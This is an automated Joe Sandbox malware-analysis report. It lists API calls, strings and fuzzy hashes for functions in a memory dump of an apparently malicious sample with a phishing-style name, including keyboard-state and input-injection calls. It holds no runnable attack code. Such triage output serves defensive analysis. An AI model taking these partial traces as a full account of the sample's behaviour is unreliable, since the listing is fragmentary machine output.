Instruction ID: 0fa2738ee66bff6b9aad57af393c174662b09afa1e14dc21bac144490ee1b73f
Opcode Fuzzy Hash: 0c96f39c77774036a7716a7bec0546536907d3ee8cd632b8fccfa0ca1fcff42f
Instruction Fuzzy Hash: F5319174A40108AFDB10DF54C881EAABBF8EF48318F1480A8F909DB352D771ED46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A141EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A1424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A14264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A14271

Strings

msctls_trackbar32, xrefs: 00A14226

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: dba42f6e797ab44ccd07c8f6667f1e2994c11765382ab9a07296481e7c537da9
Instruction ID: 0dc21b92f7a2f889ac08aaaf966469aefd1fa3cdc11bf160a86da93a47c442eb
Opcode Fuzzy Hash: dba42f6e797ab44ccd07c8f6667f1e2994c11765382ab9a07296481e7c537da9
Instruction Fuzzy Hash: E311C671240248BEEF209F69CC46FEB3BADEF99B64F110614FA55E6090D671DC919B10

Uniqueness

Uniqueness Score: -1.00%

Function 009E2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A

Part of subcall function 009E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009E2DC5
Part of subcall function 009E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E2DD6
Part of subcall function 009E2DA7: GetCurrentThreadId.KERNEL32 ref: 009E2DDD
Part of subcall function 009E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009E2DE4

GetFocus.USER32 ref: 009E2F78

Part of subcall function 009E2DEE: GetParent.USER32(00000000), ref: 009E2DF9

GetClassNameW.USER32(?,?,00000100), ref: 009E2FC3
EnumChildWindows.USER32(?,009E303B), ref: 009E2FEB

Strings

%s%d, xrefs: 009E2FFF

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 1efef1108ad99c1266843477fb6af030a07806a0814f7486ebf88eb022c237d3
Instruction ID: 6958de6f944338a4520055cae016ae33d1812f8e34d12d2848f94d8d7fdbd6e5
Opcode Fuzzy Hash: 1efef1108ad99c1266843477fb6af030a07806a0814f7486ebf88eb022c237d3
Instruction Fuzzy Hash: BE11A2756002456BCF15BF75DC89FEE376EAFD4314F048075BA099B292DE309E458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A15882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A158C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A158EE
DrawMenuBar.USER32(?), ref: 00A158FD

Strings

0, xrefs: 00A1588F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 41f03fbff50e0021ce5bc5e43bc3febcb78cfce56169be2cc11ad442ac763a77
Instruction ID: 2439c447083dd9a75b77827958fb9a03f93385a5b70262b4f01f8f9d9c989f08
Opcode Fuzzy Hash: 41f03fbff50e0021ce5bc5e43bc3febcb78cfce56169be2cc11ad442ac763a77
Instruction Fuzzy Hash: F0016D35900218EFDB219FA5DC44BEEBBB9FB85360F10C099E849D6151DB308AC4DF21

Uniqueness

Uniqueness Score: -1.00%

Function 009DD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 009DD3BF
FreeLibrary.KERNEL32 ref: 009DD3E5

Strings

X64, xrefs: 009DD2A8
GetSystemWow64DirectoryW, xrefs: 009DD3B9

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: e34f5901813f14b4e72b702f297a8fad3b946990dbf415c1fc1fd374d6bd2703
Instruction ID: 8bd7f3ba0bf4db69f9d166ee9b4907921b775124a107134f65b1c091590e3e6b
Opcode Fuzzy Hash: e34f5901813f14b4e72b702f297a8fad3b946990dbf415c1fc1fd374d6bd2703
Instruction Fuzzy Hash: 4EF055344C3610EBD7308A188C48DADB338BF00B11B64CA4BF126F6294E734CC84CB42

Uniqueness

Uniqueness Score: -1.00%

Function 009E007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88e97fa0fab8b9460e25b362d0d4b6681f18563f72bb54c3470620b435eba6f1
Instruction ID: d5a2ccddce0066ebf3b0f1e6687a21479abba3774c2a5201ef408edb15beacec
Opcode Fuzzy Hash: 88e97fa0fab8b9460e25b362d0d4b6681f18563f72bb54c3470620b435eba6f1
Instruction Fuzzy Hash: B1C16C75A0024AEFCB15CFA5C894BAEB7B9FF88304F208598E515EB251D771ED81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009B3E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 009B3F0B
__alldvrm.LIBCMT ref: 009B410C
__alldvrm.LIBCMT ref: 009B412E

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction ID: e248748538cebb7931629ca3b73a7081fcae61f609b08af9f11bc8e88ac28dca
Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction Fuzzy Hash: 52A15971D043869FEB11DF18CA917FEBBE9EF62360F14816DE5859B282C2388D41D751

Uniqueness

Uniqueness Score: -1.00%

Function 00A0342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A03459
CoUninitialize.OLE32 ref: 00A03463
VariantInit.OLEAUT32(?), ref: 00A0346E
VariantClear.OLEAUT32(?), ref: 00A0371B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: fe0e49a58d45d05dba0f13c959bd1a9306d2233ac02028e63ecab910da3f96f7
Instruction ID: a9bed9e432dcf7d10fea4e081677c9748d6e40e9db41a091b2efaaa1d7bf5c1b
Opcode Fuzzy Hash: fe0e49a58d45d05dba0f13c959bd1a9306d2233ac02028e63ecab910da3f96f7
Instruction Fuzzy Hash: D5A14D766043049FCB00EF68D585A2AB7E9FF88714F14885DF99A9B3A2DB31ED01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009E0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A1FC08,?), ref: 009E05F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A1FC08,?), ref: 009E0608
CLSIDFromProgID.OLE32(?,?,00000000,00A1CC40,000000FF,?,00000000,00000800,00000000,?,00A1FC08,?), ref: 009E062D
_memcmp.LIBVCRUNTIME ref: 009E064E

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 9a083f149c432dc86124c6d39bd9cffa8957e776ee35f36999018b7428b834ff
Instruction ID: 212c721a9a93d77edfcfd1f700471f8a677176b9707b80f7071bcb32659975a6
Opcode Fuzzy Hash: 9a083f149c432dc86124c6d39bd9cffa8957e776ee35f36999018b7428b834ff
Instruction Fuzzy Hash: 2F811771A00209EFCB05DF95C984EEEB7B9FF89315F204598F506AB250DB71AE46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009C1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009C14C0

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: eca534e591f5cfd2ba0e9ece2f7d3311c82cd00a34b84affaddabf394db13b27
Instruction ID: 384267337d161fd93fa02441f863d4d03665561ad89a1185ef751fc5008f7396
Opcode Fuzzy Hash: eca534e591f5cfd2ba0e9ece2f7d3311c82cd00a34b84affaddabf394db13b27
Instruction Fuzzy Hash: 94413E31D00510ABDB297BF98C45FFE3AA9EF83370F14462DF819D62A3E634484156A7

Uniqueness

Uniqueness Score: -1.00%

Function 00A16278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(015EE460,?), ref: 00A162E2
ScreenToClient.USER32(?,?), ref: 00A16315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00A16382

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 508bd5b62da4d348c702fef18b27670bb949a92454080fcf97f1c70c7e191970
Instruction ID: 49e63783771f26990e8c3ed65871c2205372f5d74ecec89f57505de3308f608d
Opcode Fuzzy Hash: 508bd5b62da4d348c702fef18b27670bb949a92454080fcf97f1c70c7e191970
Instruction Fuzzy Hash: 7651F974A00209EFDB10DF68D981AEE7BB6FB45360F108169F965DB2A0D770ED81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A01AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00A01AFD
WSAGetLastError.WSOCK32 ref: 00A01B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A01B8A
WSAGetLastError.WSOCK32 ref: 00A01B94

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: b167f80638d4834c1ae9f55239b9734ab51a8ee60ff6319a73c1d066a161415f
Instruction ID: bcb4029441fb70644131dbea6c08279850db8b2f347029dfe6eafe5186767d51
Opcode Fuzzy Hash: b167f80638d4834c1ae9f55239b9734ab51a8ee60ff6319a73c1d066a161415f
Instruction Fuzzy Hash: 7041C474640200AFE720AF24D886F6577E5AF85718F54C448FA1A9F7D2E772DD42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009BB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78420e15445c8599d7c52c055b46ecae91615ca223f1a1404bb6dcbb6e562829
Instruction ID: ae40fa690e73edba48edabd81efcb54dfc3a0617675f4fc468893ea111d2adbc
Opcode Fuzzy Hash: 78420e15445c8599d7c52c055b46ecae91615ca223f1a1404bb6dcbb6e562829
Instruction Fuzzy Hash: 54413871A00704AFD7249F78CD41BAABBA9EBC9720F10452EF556DB2D2D7B199008780

Uniqueness

Uniqueness Score: -1.00%

Function 009F56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009F5783
GetLastError.KERNEL32(?,00000000), ref: 009F57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009F57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009F57FA

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: a480ebee3385cb797b14305e0219bfdf15b86cf6525247f4cae2963772254e29
Instruction ID: 1c9eca90d37a10d8b8e4b940e8f1e6b0e3f3ce3e355a34e5b81ff419d13eacbd
Opcode Fuzzy Hash: a480ebee3385cb797b14305e0219bfdf15b86cf6525247f4cae2963772254e29
Instruction Fuzzy Hash: 1D412939600610DFCB11EF55C444A5EBBE6AF89720B19C488F95AAB362CB34FD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009BD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,009A6D71,00000000,00000000,009A82D9,?,009A82D9,?,00000001,009A6D71,8BE85006,00000001,009A82D9,009A82D9), ref: 009BD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009BD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009BD9AB
__freea.LIBCMT ref: 009BD9B4

Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: e228ba61049815d5dfd18ae58d773361c2ffaf41e6ffe147d213102097de4b44
Instruction ID: baff225efbda4ad63ec59b34815cff5a7d3f3f7419d928086635660e4acb2e82
Opcode Fuzzy Hash: e228ba61049815d5dfd18ae58d773361c2ffaf41e6ffe147d213102097de4b44
Instruction Fuzzy Hash: 0631C172A0221AABDF24DFA5DD45EEE7BA9EB81720F054168FC04D7150EB35CD51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A152C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00A15352
GetWindowLongW.USER32(?,000000F0), ref: 00A15375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A15382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A153A8

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 3bdedbc40e38eed23abe4e75f26fe4f6e1a90b07e3bf3eafecd9bcd8e7df57bb
Instruction ID: a5b239070de5e836280c2e06e9b002664120c52c7e9c3c938c742bc1cf364214
Opcode Fuzzy Hash: 3bdedbc40e38eed23abe4e75f26fe4f6e1a90b07e3bf3eafecd9bcd8e7df57bb
Instruction Fuzzy Hash: 2B31C434E55A08EFEB349F74CC25BE83766AB85390F584102FA309B1E1C7B49DC0AB41

Uniqueness

Uniqueness Score: -1.00%

Function 009EAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 009EABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 009EAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 009EAC74
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 009EACC6

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9fb91712908d187e4941020c8d6b1320088751aa588f7d66184e338fb3cddd53
Instruction ID: 30b06061448a5289111ac2ada1ad6a57d80831c35795f1fba121fdf2004f4753
Opcode Fuzzy Hash: 9fb91712908d187e4941020c8d6b1320088751aa588f7d66184e338fb3cddd53
Instruction Fuzzy Hash: D6313B30A403986FEF36CB668C047FE7BA9AB85320F28471AE4D5521F1C378AD858753

Uniqueness

Uniqueness Score: -1.00%

Function 00A17674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00A1769A
GetWindowRect.USER32(?,?), ref: 00A17710
PtInRect.USER32(?,?,00A18B89), ref: 00A17720
MessageBeep.USER32(00000000), ref: 00A1778C

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: ad95808c4bacb3a855a0f50776d52cae3c949cefc372cbe8ba2de67b98dfad6e
Instruction ID: 98a6cf134fe269b2e1177bcaa5fa3e0b5d162c4014fdd4be3870b6a29253fdd6
Opcode Fuzzy Hash: ad95808c4bacb3a855a0f50776d52cae3c949cefc372cbe8ba2de67b98dfad6e
Instruction Fuzzy Hash: 5A416D74A05214DFCB11CF98C894EEDB7F5FB49315F1591A8E4249B2A1C730E982CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A116DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A116EB

Part of subcall function 009E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E3A57
Part of subcall function 009E3A3D: GetCurrentThreadId.KERNEL32 ref: 009E3A5E
Part of subcall function 009E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009E25B3), ref: 009E3A65

GetCaretPos.USER32(?), ref: 00A116FF
